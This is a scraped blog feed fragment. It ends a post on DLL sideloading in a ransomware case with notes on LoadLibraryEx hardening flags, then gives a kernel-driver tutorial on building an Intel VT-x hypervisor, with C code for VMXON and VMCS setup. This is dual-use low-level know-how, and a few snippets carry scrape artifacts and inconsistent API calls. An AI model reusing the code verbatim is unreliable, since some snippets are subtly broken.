<p>Its clear that from the simple encryption method and the hardcoded message seems to lack a clear motive other than being distruptive or the finale of a prank, that this isn't really a serious piece of ransomware. Yet the fact that HoYoverse didn't think to put safeguards to check the validity of the DLL running is, interesting.</p>
<p>For Windows 8 and later (or Windows 7 with KB2533623 installed), the <code>LoadLibraryEx</code> function offers <a target="_blank" href="https://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibraryexa">enhanced control over DLL loading</a>. This native Windows API function provides several new flags designed to improve security and specificity in DLL loading.</p>
<p>Some notable flags include:</p>
<ul>
<li><p><code>LOAD_LIBRARY_SEARCH_APPLICATION_DIR</code>: Searches the application's directory.</p>
</li>
<li><p><code>LOAD_LIBRARY_SEARCH_SYSTEM32</code>: Searches the System32 directory.</p>
</li>
<li><p><code>LOAD_LIBRARY_SEARCH_USER_DIRS</code>: Searches user-defined directories.</p>
</li>
<li><p><code>LOAD_LIBRARY_REQUIRE_SIGNED_TARGET</code>: Ensures the loaded library is digitally signed.</p>
</li>
<li><p><code>LOAD_LIBRARY_SAFE_CURRENT_DIRS</code>: Safely searches current directories.</p>
</li>
</ul>
<p>These flags allow developers to specify exact search locations for DLLs. It also enhances security by requiring digital signatures.</p>
<h1 id="heading-conclusion">Conclusion</h1>
<p>Honestly, <a target="_blank" href="https://www.loldrivers.io/">vulnerable drivers</a> aren't rare and so are <a target="_blank" href="https://mansk1es.gitbook.io/edr-binary-abuse">DLL sideload attacks</a>. This is not to say that HoYoverse is incompetent, but perhaps more of an illustration on how big they have gotten as a cultural centerpiece. Which is a good thing.</p>
<p>Threat Actors leveraging HoYoverse tools and infrastructure will definitely grow, as the game is frequented by younger folks who are in prime internship age. Usually companies mandate interns to bring their own devices to work, and these devices can log into SSO systems and internal networks without being covered by an EDR solution making them a good soft target for threat actor.</p>
<p>Its infrastructure has also been somewhat of an interesting specimen, especially with a recent report from Kaspersky's GReAT stating that <a target="_blank" href="https://securelist.com/hz-rat-attacks-wechat-and-dingtalk/113513/">a threat actor has been targeting users</a> of DingTalk and WeChat Enterprise with malware that was downloaded from MiHoYo servers.</p>
<p>Personally I'm excited for whats next, I'm all for commissioning more art of gacha women for my blogpost thats for sure.</p>
]]></content:encoded></item><item><title><![CDATA[The Basics of Intel VT-x Extensions]]></title><description><![CDATA[Cover Illustration by t0meku

Traditionally, x86 processors lacked built-in virtualization support, leading to significant challenges when implementing efficient Virtual Machine Monitors (VMMs) or hypervisors.
But then Intel made Intel VT as a hardwa...]]></description><link>https://research.meekolab.com/the-basics-of-intel-vt-x-extensions</link><guid isPermaLink="true">https://research.meekolab.com/the-basics-of-intel-vt-x-extensions</guid><dc:creator><![CDATA[meekochii]]></dc:creator><pubDate>Tue, 27 Aug 2024 16:21:15 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1724775614186/fe6ad170-4f0c-4587-97cf-4c08937932cf.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong><em>Cover Illustration by t0meku</em></strong></p>
</blockquote>
<p>Traditionally, x86 processors lacked built-in virtualization support, leading to significant challenges when implementing efficient Virtual Machine Monitors (VMMs) or hypervisors.</p>
<p>But then Intel made Intel VT as a hardware-based solution for virtualization acceleration. With VT-x, Intel aimed to reduce hypervisor complexity by offloading certain virtualization tasks to hardware, VT-x allows for the development of simpler, more reliable VMMs.</p>
<p>This hardware solution also improves separation between different virtual machines and between virtual machines and the VMM, crucial for security and stability in multi-tenant environments.</p>
<p>In this article, I'll be developing a hypervisor using Intel's VT-x virtualization technology because i got bored i guess idk and i tried reading the <a target="_blank" href="https://www.intel.com/content/www/us/en/developer/articles/technical/intel-sdm.html">Intel Architecture SDM documentation</a>. But i must say i wasn't strong enough to thug it all out and some parts of this article is also based on this <a target="_blank" href="https://rayanfam.com/topics/hypervisor-from-scratch-part-1/">Sina Karvandi's tutorial on how to build a Hypervisor from scratch</a> with Intel VT.</p>
<h1 id="heading-verify-cpu-support-for-vt-x">Verify CPU support for VT-x</h1>
<p>The VMM (Virtual Machine Monitor) startup process is described in detail in Chapter 31.5 of the <a target="_blank" href="https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-3c-part-3-manual.pdf">Intel® 64 and IA-32 Architectures Software Developer’s Manual Volume 3C: System Programming Guide, Part 3, Section 31.5</a>.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1722109042825/144bb8d8-9b4d-4bb9-a2f8-81950ec4dbba.png" alt class="image--center mx-auto" /></p>
<p>But to enable and initialize virtualization technology (VT) on a CPU, we must first verify VT support using the cpuid command and specific MSR registers. Next, allocate 4KB-aligned non-paged memory for the vmxon area, with the size specified in the <code>IA32_VMX_BASIC</code> register.</p>
<p>Then we initialize the vmxon area by setting its version number, obtained from the lower 4 bytes of <code>IA32_VMX_BASIC</code> (typically 1). Then, configure <code>cr0</code> and <code>cr4</code> registers according to the requirements set by <code>IA32_VMX_CR0_FIXED0</code>, <code>IA32_VMX_CR0_FIXED1</code>, <code>IA32_VMX_CR4_FIXED0</code>, and <code>IA32_VMX_CR4_FIXED1</code> registers.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1722270276809/766fcd98-5d73-4a4a-9ad2-774dd223c4e2.png" alt class="image--center mx-auto" /></p>
<p>We need to then ensure the <code>IA32_FEATURE_CONTROL</code> register is correctly set, with bits 0 and 2 both set to 1. This can be verified by reading the register and performing a bitwise AND with 5. Finally, execute the vmxon instruction, passing a pointer to the physical address of the vmxon area. The instruction's success is indicated by <code>rflags.cf=0,</code> while failure results in <code>rflags.cf=1</code>.</p>
<pre><code class="lang-c"><span class="hljs-comment">// Check if BIOS has enabled VT</span>
<span class="hljs-function">BOOLEAN <span class="hljs-title">VmxIsCheckSupportVTBIOS</span><span class="hljs-params">(VOID)</span>
</span>{
    ULONG64 value = __readmsr(IA32_FEATURE_CONTROL);
    <span class="hljs-keyword">return</span> (value &amp; <span class="hljs-number">0x5</span>) == <span class="hljs-number">0x5</span>;
}

<span class="hljs-comment">// Check if CPU supports VT</span>
<span class="hljs-function">BOOLEAN <span class="hljs-title">VmxIsCheckSupportVTCPUID</span><span class="hljs-params">(VOID)</span>
</span>{
    <span class="hljs-keyword">int</span> cpuidInfo[<span class="hljs-number">4</span>];
    __cpuidex(cpuidInfo, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>);
    <span class="hljs-comment">// CPUID ECX.VMX[bit 5] = 1 if VT is supported</span>
    <span class="hljs-keyword">return</span> (cpuidInfo[<span class="hljs-number">2</span>] &amp; (<span class="hljs-number">1</span> &lt;&lt; <span class="hljs-number">5</span>)) != <span class="hljs-number">0</span>;
}

<span class="hljs-comment">// Check if VT is enabled in CR4</span>
<span class="hljs-function">BOOLEAN <span class="hljs-title">VmxIsCheckSupportVTCr4</span><span class="hljs-params">(VOID)</span>
</span>{
    ULONG64 cr4 = __readcr4();
    <span class="hljs-comment">// CR4.VMXE[bit 13] = 1 if VT is enabled</span>
    <span class="hljs-keyword">return</span> (cr4 &amp; (<span class="hljs-number">1</span> &lt;&lt; <span class="hljs-number">13</span>)) != <span class="hljs-number">0</span>;
}

<span class="hljs-function">VOID <span class="hljs-title">CheckVT</span><span class="hljs-params">(VOID)</span>
</span>{
    KIRQL oldIrql;
    PROCESSOR_NUMBER procNumber;
    KeGetCurrentProcessorNumberEx(&amp;procNumber);
    oldIrql = KeRaiseIrqlToDpcLevel();

    <span class="hljs-keyword">if</span> (VmxIsCheckSupportVTCPUID())
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_INFO_LEVEL,
            <span class="hljs-string">"[INFO]: CPU supports VT (Processor %u:%u)\n"</span>,
            procNumber.Group, procNumber.Number);
    }
    <span class="hljs-keyword">if</span> (VmxIsCheckSupportVTBIOS())
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_INFO_LEVEL,
            <span class="hljs-string">"[INFO]: BIOS has enabled VT (Processor %u:%u)\n"</span>,
            procNumber.Group, procNumber.Number);
    }
    <span class="hljs-keyword">if</span> (VmxIsCheckSupportVTCr4())
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_INFO_LEVEL,
            <span class="hljs-string">"[INFO]: VT is enabled in CR4 (Processor %u:%u)\n"</span>,
            procNumber.Group, procNumber.Number);
    }

    KeLowerIrql(oldIrql);
}
</code></pre>
<h1 id="heading-vmxon-execution">VMXON Execution</h1>
<p>Next we're gonna need to start with VMXON Execution, which transitions the logical processor from normal operation into VMX root operation. We first need to allocate a 4KB-aligned, non-paged memory block for the VMXON region. This alignment is crucial for the proper functioning of virtualization features, and non-paged memory ensures that the VMXON region is always accessible and not swapped out to disk.</p>
<p>To allocate this memory, you typically use a function like <code>MmAllocateContiguousMemorySpecifyCache</code>. This function allows you to specify the size of the allocation (which should be <code>PAGE_SIZE</code>, or 4KB), as well as the physical address range within which the allocation should occur.</p>
<pre><code class="lang-c">PHYSICAL_ADDRESS lowPhys, highPhys;
lowPhys.QuadPart = <span class="hljs-number">0</span>;
highPhys.QuadPart = <span class="hljs-number">-1</span>;
pVcpu-&gt;VmxOnRegion = MmAllocateContiguousMemorySpecifyCache(PAGE_SIZE, lowPhys, highPhys, MmCached);
<span class="hljs-keyword">if</span> (!pVcpu-&gt;VmxOnRegion)
{
    <span class="hljs-comment">// Handle allocation failure</span>
    <span class="hljs-keyword">return</span> STATUS_INSUFFICIENT_RESOURCES;
}

pVcpu-&gt;VmxOnRegionPhys = MmGetPhysicalAddress(pVcpu-&gt;VmxOnRegion);
</code></pre>
<p>We can set the lower bound of the physical address to 0 and the upper bound to -1 (which effectively means the highest possible address), allowing the system to allocate the memory anywhere in physical memory that meets our requirements.</p>
<p>Once the memory is allocated, it needs to be properly initialized. This process is described in detail in section 25.11.5 of the Intel Software Developer's Manual. The VMXON region is a block of memory that will be used by the operating system to manage the virtual machine.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1722109287543/7af1347f-6525-42be-ba03-809bf946b121.png" alt class="image--center mx-auto" /></p>
<p>After allocating the memory, you need to use a function like <code>rtlzeromemory</code> to clear the entire region. This step is crucial to prevent any potential issues caused by leftover data in the memory pages. All bits in this region should be set to zero, with one important exception: the first four bytes of the <code>VMXON</code> region.</p>
<p>The first four bytes of the <code>VMXON</code> region must be filled with the <code>VMX</code> revision identifier. This identifier is stored in the <code>IA32_VMX_BASIC</code> Model Specific Register (MSR). You can read this MSR and use its lower 32 bits as the revision identifier.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1722109445427/c61e3a29-20da-45b2-be25-74c1af03b648.png" alt class="image--center mx-auto" /></p>
<pre><code class="lang-c">ULONG64 vmxBasic = __readmsr(IA32_VMX_BASIC);
*(PULONG)pVmxonRegion = (ULONG)vmxBasic;
</code></pre>
<p>It's worth noting that the lower 4 bytes of this register typically contain the value 1. However, this may change in future CPU versions, so it's always best to read the actual value from the MSR rather than hardcoding it.</p>
<p>The VMXON region has several important requirements that must be met:</p>
<ol>
<li><p>It must be 4KB aligned, which we ensured during the memory allocation step.</p>
</li>
<li><p>It should not set any bits beyond the processor's physical address width. This is typically not an issue if you're using the allocation method described above.</p>
</li>
<li><p>The first 4 bytes should contain the VMCS revision identifier, which we set using the code above.</p>
</li>
</ol>
<p>Before executing VMXON, we must configure the CR0 and CR4 control registers according to the requirements specified by four MSRs: <code>IA32_VMX_CR0_FIXED0</code>, <code>IA32_VMX_CR0_FIXED1</code>, <code>IA32_VMX_CR4_FIXED0</code>, and <code>IA32_VMX_CR4_FIXED1</code>.</p>
<p>For CR0, any bit that is set to 1 in <code>IA32_VMX_CR0_FIXED0</code> must be set to 1 and any bit that is set to 0 in <code>IA32_VMX_CR0_FIXED1</code> must be set to 0. Similarly, for CR4, any bit that is set to 1 in <code>IA32_VMX_CR4_FIXED0</code> must be set to 1 and any bit that is set to 0 in <code>IA32_VMX_CR4_FIXED1</code> must be set to 0. To implement these rules, you would typically read the current values of CR0 and CR4, read the values of the fixed MSRs, and then adjust CR0 and CR4 accordingly.</p>
<pre><code class="lang-c">ULONG64 cr0 = __readcr0();
ULONG64 cr4 = __readcr4();
ULONG64 cr0_fixed0 = __readmsr(IA32_VMX_CR0_FIXED0);
ULONG64 cr0_fixed1 = __readmsr(IA32_VMX_CR0_FIXED1);
ULONG64 cr4_fixed0 = __readmsr(IA32_VMX_CR4_FIXED0);
ULONG64 cr4_fixed1 = __readmsr(IA32_VMX_CR4_FIXED1);

cr0 = (cr0 | cr0_fixed0) &amp; cr0_fixed1;
cr4 = (cr4 | cr4_fixed0) &amp; cr4_fixed1;

__writecr0(cr0);
__writecr4(cr4);
</code></pre>
<p>This code ensures that all required bits are set in CR0 and CR4, and all bits that must be clear are cleared, while preserving the values of other bits that don't need to be changed. After completing all those steps, we are finally ready to execute the <code>VMXON</code> instruction.</p>
<pre><code class="lang-c"><span class="hljs-keyword">int</span> error = __vmx_on(&amp;pVmxonRegion-&gt;PhysicalAddress.QuadPart);
</code></pre>
<p>The <code>__vmx_on</code> function is an intrinsic provided by most compilers that support Intel VT-x. It takes a pointer to the physical address of the <code>VMXON</code> region we prepared earlier.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1722270437591/cfe9f58b-c6fa-4283-8b03-a180be858c8e.png" alt class="image--center mx-auto" /></p>
<p>It's important to note that there are additional checks and requirements specified in the Intel manual, particularly in section 26.3.1.1.</p>
<ul>
<li><p>The <code>IA32_FEATURE_CONTROL</code> MSR must be properly configured to allow <code>VMXON</code> to execute.</p>
</li>
<li><p>Bit 5 of CR4 (corresponding to Physical Address Extension) must be set to 1 for VMXON to succeed. The CR0 bits corresponding to Protected Mode (bit 0) and Paging (bit 31) must also be set to 1.</p>
</li>
<li><p>The <code>IA32_FEATURE_CONTROL_MSR</code> must be properly configured to allow <code>VMXON</code> to execute. Specifically, bit 0 (the lock bit) must be set, and either bit 1 (enabling VMXON outside of SMX operation) or bit 2 (enabling <code>VMXON</code> inside SMX operation) must be set, depending on your specific use case.</p>
</li>
<li><p>If you're operating in 64-bit mode, you need to ensure that the <code>IA32_EFER.LMA</code> bit is set to 1, indicating that the processor is in IA-32e mode.</p>
</li>
</ul>
<p>These additional checks and requirements ensure that the processor is in the correct state to begin VMX operation. Failing to meet any of these requirements will cause the VMXON instruction to fail, potentially with a #GP (General Protection) exception.</p>
<h1 id="heading-allocating-vmcs-memory-and-vmclear-execution">Allocating VMCS Memory and VMCLEAR Execution</h1>
<p>After entering VMX operation mode, we then need to set up the Virtual Machine Control Structure (VMCS). The VMCS is a data structure in memory that controls the behavior of a virtual machine in Intel VT-x. It stores the guest state, host state, and control information for a virtual machine.</p>
<p>This process bears similarities to the allocation of the VMXON region, but it comes with its own set of specific requirements. The memory allocated for the VMCS must be 4KB aligned and non-paged, ensuring that it remains accessible at all times and isn't swapped out to disk. This alignment and memory type are crucial for the proper functioning of the virtualization features.</p>
<p>Once the memory is allocated, it needs to be initialized. The first 4 bytes of this newly allocated memory block play a special role. They must be filled with the lower 4 bytes of the <code>IA32_VMX_BASIC</code> Model Specific Register (MSR). This initialization step is critical as it sets up the VMCS with the correct version identifier, ensuring compatibility with the processor's VMX implementation.</p>
<p>The VMCS is a complex data structure that will eventually store a wide array of information about the virtual machine. This includes various registers, control areas, and even the vmexit control area. However, at this stage, we're only setting up the basic structure. The detailed configuration of these areas will come later, through the use of the <code>VMWRITE</code> instruction.</p>
<pre><code class="lang-c">PHYSICAL_ADDRESS lowPhys, highPhys;
lowPhys.QuadPart = <span class="hljs-number">0</span>;
highPhys.QuadPart = <span class="hljs-number">-1</span>;
pVcpu-&gt;VmcsRegion = MmAllocateContiguousMemorySpecifyCache(PAGE_SIZE, lowPhys, highPhys, MmCached);
<span class="hljs-keyword">if</span> (!pVcpu-&gt;VmcsRegion)
{
    <span class="hljs-comment">// Handle allocation failure</span>
    <span class="hljs-keyword">return</span> STATUS_INSUFFICIENT_RESOURCES;
}

RtlZeroMemory(pVcpu-&gt;VmcsRegion, PAGE_SIZE);
pVcpu-&gt;VmcsRegionPhys = MmGetPhysicalAddress(pVcpu-&gt;VmcsRegion);

<span class="hljs-comment">// Initialize VMCS with revision identifier</span>
ULONG64 vmxBasic = __readmsr(IA32_VMX_BASIC);
*(PULONG)pVcpu-&gt;VmcsRegion = (ULONG)vmxBasic;
</code></pre>
<p>After allocating and performing the basic initialization of the VMCS memory, the next step in our process is to use the <code>VMCLEAR</code> instruction. <code>VMCLEAR</code> serves several important purposes in the setup of our virtual machine environment. First, it initializes the VMCS, setting its launch state to "clear". This is a necessary step before the VMCS can be used for a virtual machine. Second, <code>VMCLEAR</code> invalidates any cached VMCS data that the processor might be holding from previous uses of this VMCS. This ensures that we're starting with a clean slate. Finally, <code>VMCLEAR</code> ensures that all VMCS data is written to the VMCS region in memory, maintaining data consistency.</p>
<p>The <code>VMCLEAR</code> instruction is relatively simple to use. It takes a pointer to the physical address of the VMCS as its operand.</p>
<pre><code class="lang-c"><span class="hljs-keyword">int</span> error = __vmx_vmclear(&amp;pVcpu-&gt;VmcsRegionPhys.QuadPart);
<span class="hljs-keyword">if</span> (error)
{
    <span class="hljs-comment">// Handle VMCLEAR failure</span>
    <span class="hljs-keyword">return</span> STATUS_UNSUCCESSFUL;
}
</code></pre>
<p>It's crucial to check the return value of <code>VMCLEAR</code>. If it fails, it's an indication that something has gone wrong in our VMX setup, and we should not proceed with further VMX operations using this VMCS. Only then we go make this VMCS the current VMCS using the <code>VMPTRLD</code> instruction:</p>
<pre><code class="lang-c">cCopyerror = __vmx_vmptrld(&amp;pVcpu-&gt;VmcsRegionPhys.QuadPart);
<span class="hljs-keyword">if</span> (error)
{
    <span class="hljs-comment">// Handle VMPTRLD failure</span>
    <span class="hljs-keyword">return</span> STATUS_UNSUCCESSFUL;
}
</code></pre>
<p>This step is crucial because it makes the VMCS active and current, allowing us to use <code>VMREAD</code> and <code>VMWRITE</code> instructions to configure it in the subsequent steps.</p>
<h1 id="heading-setup-vmcs">Setup VMCS</h1>
<p>As the VMCS acts as the interface between the hypervisor and VM, controlling how the virtual environment operates, we need to configure VMCS fields to determine the guest's perceived hardware state and set rules for VM exits and entries.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1722135453816/bea25c60-edf5-4bff-8f6d-842c25eb1c0b.png" alt class="image--center mx-auto" /></p>
<p>Chapter 24.3 of the Intel white paper describes the fields in the VMCS control area in detail. As mentioned in the previous article, the vmcs fields that need to be set are:</p>
<ol>
<li><p>Guest state fields, when VT exits from the virtual machine, the processor status (registers, etc.) will be stored in this area. When entering the virtual machine (turning on VT), the status of various processors in the virtual machine is determined by the value of the corresponding field in this area when entering the virtual machine.</p>
</li>
<li><p>Host state fields, when exiting from a virtual machine, the host takes over the CPU. After the host takes over, the states of various registers are stored in this area. That is to say, when a vm-exit event occurs in the virtual machine, the CPU will return from the guest to the host, and the values in this area will be set to the corresponding registers, and then continue to execute according to the eip after the setting.</p>
</li>
<li><p>VM-execution control fields</p>
</li>
<li><p>VM-exit control fields</p>
</li>
<li><p>VM-entry control fields</p>
</li>
</ol>
<p>In addition to these five areas, vmcs also has an area called the vm exit information area. This area is read-only and stores the number of the failure code after the vmx instruction fails.</p>
<p>Now there are four important fields that need to be obtained when filling the guest and host areas. They are rip and rsp after entering the guest area, and rip rsp after returning from the guest to the host area. Here we want to make the system continue to operate normally after entering the guest area, or run down from the original place. Therefore, the return address and rsp of the upper layer function to be returned must be obtained through the function. As for the host eip after returning to the host area, since the return from the virtual machine must be a vmexit event, the event needs to be processed, so the rip after returning from the virtual machine must be set to the processing function of the vmexit event. And rsp needs to open up a new memory area for the vmexit event processing function. If the stack before the guest returns is still used, the contents of the stack will be destroyed, resulting in unpredictable results.</p>
<p>Before initializing the vmcs area, we must first obtain the rip and rsp of the guest after entering the guest. Since we hope that the virtual machine can continue to execute on the code before we enter the guest after entering the guest, we need to obtain the return address of the vmxinit function and the rsp of the previous function saved in the stack. After entering the guest, start running directly from the return address of the vmxinit function, and set the stack to the stack of the previous function. Here we need to use a vs embedded function <code>_AddressOfReturnAddress</code>. This function will return a pointer to the return address of the previous function in the stack during compilation. Therefore, through this function, we can get a pointer to the rip that needs to be used. The rsp of the previous function is 8 bytes below the location where rip is stored. Therefore, the code to obtain the rip and rsp of the guest function is as follows:</p>
<pre><code class="lang-c">PULONG64 retAddr = (PULONG64)_AddressOfReturnAddress();
ULONG64 guestEsp = retAddr + <span class="hljs-number">1</span>;
ULONG64 guestEip = *retAddr;
</code></pre>
<p>Therefore, the general framework of the vmxinit function is as follows. hosteip passes in the address of the vmexit processing function. After a vmexit event occurs, it jumps to the vmexit processing function for corresponding processing.</p>
<pre><code class="lang-c"><span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">VmxInit</span><span class="hljs-params">(ULONG64 hostEip)</span>
</span>{
    PVMXCPUPCB pVcpu = VmxGetCurrentCPUPCB();
    pVcpu-&gt;cpuNumber = KeGetCurrentProcessorNumberEx(<span class="hljs-literal">NULL</span>);

    PULONG64 retAddr = (PULONG64)_AddressOfReturnAddress();
    ULONG64 guestEsp = (ULONG64)(retAddr + <span class="hljs-number">1</span>);
    ULONG64 guestEip = *retAddr;

    <span class="hljs-keyword">int</span> error = VmxInitVmOn();
    <span class="hljs-keyword">if</span> (error)
    {
        DbgPrintEx(<span class="hljs-number">77</span>, <span class="hljs-number">0</span>, <span class="hljs-string">"[db]:vmon initialization failed error = %d, cpunumber %d\r\n"</span>, error, pVcpu-&gt;cpuNumber);
        <span class="hljs-keyword">return</span> error;
    }

    error = VmxInitVmcs(guestEip, guestEsp, hostEip);
    <span class="hljs-keyword">if</span> (error)
    {
        DbgPrintEx(<span class="hljs-number">77</span>, <span class="hljs-number">0</span>, <span class="hljs-string">"[db]:vmcs initialization failed error = %d, cpunumber %d\r\n"</span>, error, pVcpu-&gt;cpuNumber);
        VmxDestory();
        <span class="hljs-keyword">return</span> error;
    }

    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
}
</code></pre>
<p>Then we need to set up the VMCS fields through vmxinitvmcs. Similar to setting the vmon area, first apply for a memory area and then fill in <code>IA32_VMX_BASIC</code>. After filling in the basic ID, initialize the memory through vmclear and select the vmcs area through <code>vmptrld</code>. These two steps correspond to unplugging the power and selecting the machine mentioned in the previous article. After completion, the most complex vmcs field is filled. Here, for each vmcs field, a function is encapsulated for initialization.</p>
<pre><code class="lang-c"><span class="hljs-comment">// VmxInitVmcs function</span>
<span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">VmxInitVmcs</span><span class="hljs-params">(ULONG64 GuestEip, ULONG64 GuestEsp, ULONG64 hostEip)</span>
</span>{
    PVMXCPUPCB pVcpu = VmxGetCurrentCPUPCB();
    PHYSICAL_ADDRESS lowphys, heiPhy;
    lowphys.QuadPart = <span class="hljs-number">0</span>;
    heiPhy.QuadPart = <span class="hljs-number">-1</span>;

    pVcpu-&gt;VmxcsAddr = MmAllocateContiguousMemorySpecifyCache(PAGE_SIZE, lowphys, heiPhy, lowphys, MmCached);
    <span class="hljs-keyword">if</span> (!pVcpu-&gt;VmxcsAddr)
    {
        <span class="hljs-keyword">return</span> <span class="hljs-number">-1</span>;  <span class="hljs-comment">// Memory allocation failed</span>
    }

    <span class="hljs-built_in">memset</span>(pVcpu-&gt;VmxcsAddr, <span class="hljs-number">0</span>, PAGE_SIZE);
    pVcpu-&gt;VmxcsAddrPhys = MmGetPhysicalAddress(pVcpu-&gt;VmxcsAddr);

    pVcpu-&gt;VmxHostStackTop = MmAllocateContiguousMemorySpecifyCache(PAGE_SIZE * <span class="hljs-number">36</span>, lowphys, heiPhy, lowphys, MmCached);
    <span class="hljs-keyword">if</span> (!pVcpu-&gt;VmxHostStackTop)
    {
        <span class="hljs-keyword">return</span> <span class="hljs-number">-1</span>;  <span class="hljs-comment">// Memory allocation failed</span>
    }

    <span class="hljs-built_in">memset</span>(pVcpu-&gt;VmxHostStackTop, <span class="hljs-number">0</span>, PAGE_SIZE * <span class="hljs-number">36</span>);
    pVcpu-&gt;VmxHostStackBase = (ULONG64)pVcpu-&gt;VmxHostStackTop + PAGE_SIZE * <span class="hljs-number">36</span> - <span class="hljs-number">0x200</span>;

    <span class="hljs-comment">// Fill in ID</span>
    ULONG64 vmxBasic = __readmsr(IA32_VMX_BASIC);
    *(PULONG)pVcpu-&gt;VmxcsAddr = (ULONG)vmxBasic;

    <span class="hljs-comment">// Load VMCS</span>
    __vmx_vmclear(&amp;pVcpu-&gt;VmxcsAddrPhys.QuadPart);
    __vmx_vmptrld(&amp;pVcpu-&gt;VmxcsAddrPhys.QuadPart);

    VmxInitGuest(GuestEip, GuestEsp);
    VmxInitHost(hostEip);

    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
}
</code></pre>
<p>For the guest-related fields, guesteip and guestesp need to be passed in to determine where the guest starts running after entering the guest virtual machine. All other fields are filled in according to the current status. The first thing to fill in is the base, limit, attribute, and selector of each segment register in the GDT table.</p>
<p>After observing its ID, it can be found that the IDs of these fields are connected together, and the ID values differ by 2. For these segment registers, the method of separating base, limit, attribute, and selector is also very similar. Therefore, it is possible to consider encapsulating the method of filling in the attributes of the segment register into a function. Here it is encapsulated into <code>fillGdtDataItem</code> function. For the separation of each attribute, follow the figure below. The specific details of the separation are not repeated, and it is recommended to carefully read the method of cutting bits in the code.</p>
<pre><code class="lang-c"><span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">fillGdtDataItem</span><span class="hljs-params">(<span class="hljs-keyword">int</span> index, <span class="hljs-keyword">short</span> selector)</span>
</span>{
    GdtTable gdtTable = {<span class="hljs-number">0</span>};
    AsmGetGdtTable(&amp;gdtTable);
    selector &amp;= <span class="hljs-number">0xFFF8</span>;
    ULONG limit = __segmentlimit(selector);
    PULONG item = (PULONG)(gdtTable.Base + selector);
    LARGE_INTEGER itemBase = {<span class="hljs-number">0</span>};
    itemBase.LowPart = (*item &amp; <span class="hljs-number">0xFFFF0000</span>) &gt;&gt; <span class="hljs-number">16</span>;
    item++;
    itemBase.LowPart |= (*item &amp; <span class="hljs-number">0xFF000000</span>) | ((*item &amp; <span class="hljs-number">0xFF</span>) &lt;&lt; <span class="hljs-number">16</span>);

    <span class="hljs-comment">// Set attributes</span>
    ULONG attr = (*item &amp; <span class="hljs-number">0x00F0FF00</span>) &gt;&gt; <span class="hljs-number">8</span>;
    <span class="hljs-keyword">if</span> (selector == <span class="hljs-number">0</span>)
    {
        attr |= <span class="hljs-number">1</span> &lt;&lt; <span class="hljs-number">16</span>;
    }

    __vmx_vmwrite(GUEST_ES_BASE + index * <span class="hljs-number">2</span>, itemBase.QuadPart);
    __vmx_vmwrite(GUEST_ES_LIMIT + index * <span class="hljs-number">2</span>, limit);
    __vmx_vmwrite(GUEST_ES_AR_BYTES + index * <span class="hljs-number">2</span>, attr);
    __vmx_vmwrite(GUEST_ES_SELECTOR + index * <span class="hljs-number">2</span>, selector);
}
</code></pre>
<p>The GDT entry of the tr register cannot be filled like other registers. Because in 64-bit, the GDT entry of the tr register is 128 bits. Therefore, it needs to be set separately. The format of the GDT entry of the tr register in 64-bit is explained in Chapter 3.2.1 of this <a target="_blank" href="https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-1-manual.pdf">Intel white paper</a>.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1722264156712/8004bb2c-75f6-4dda-96ed-93514250096d.png" alt class="image--center mx-auto" /></p>
<p>The idea is the same as the setting idea of other GDT table items, which is to take out the corresponding bits and fill them into the vmcs area.</p>
<pre><code class="lang-c">GdtTable gdtTable = { <span class="hljs-number">0</span> };
AsmGetGdtTable(&amp;gdtTable);
ULONG trSelector = AsmReadTR();
trSelector &amp;= <span class="hljs-number">0xFFF8</span>;
ULONG trlimit = __segmentlimit(trSelector);
LARGE_INTEGER trBase = {<span class="hljs-number">0</span>};
PULONG trItem = (PULONG)(gdtTable.Base + trSelector);
</code></pre>
<p>Next is the filling of some other special registers. I won't go into detail here. There are special properties of some special registers here can be used for virtual machine detection. After performing some special operations, the results in the host state and the guest state can be different, so as to detect the existence of VT.</p>
<p>For example, in the subsequent msr settings, if you try to read a register that exceeds the msr range in the guest, an error will be thrown in the real machine, but if it is not handled specifically in the virtual machine, unpredictable results will occur. Although Intel guarantees that it cannot detect whether it is a guest in the guest, there are still many ways to perform corresponding detection.</p>
<pre><code class="lang-c">__vmx_vmwrite(GUEST_CR0, __readcr0());
__vmx_vmwrite(GUEST_CR4, __readcr4());
__vmx_vmwrite(GUEST_CR3, __readcr3());
__vmx_vmwrite(GUEST_DR7, __readdr(<span class="hljs-number">7</span>));
__vmx_vmwrite(GUEST_RFLAGS, __readeflags());
__vmx_vmwrite(GUEST_RSP, GuestEsp);
__vmx_vmwrite(GUEST_RIP, GuestEip);
__vmx_vmwrite(VMCS_LINK_POINTER, <span class="hljs-number">-1L</span>L);
__vmx_vmwrite(GUEST_IA32_DEBUGCTL, __readmsr(IA32_MSR_DEBUGCTL));
__vmx_vmwrite(GUEST_IA32_PAT, __readmsr(IA32_MSR_PAT));
__vmx_vmwrite(GUEST_IA32_EFER, __readmsr(IA32_MSR_EFER));
__vmx_vmwrite(GUEST_FS_BASE, __readmsr(IA32_FS_BASE));
__vmx_vmwrite(GUEST_GS_BASE, __readmsr(IA32_GS_BASE));
__vmx_vmwrite(GUEST_SYSENTER_CS, __readmsr(<span class="hljs-number">0x174</span>));
__vmx_vmwrite(GUEST_SYSENTER_ESP, __readmsr(<span class="hljs-number">0x175</span>));
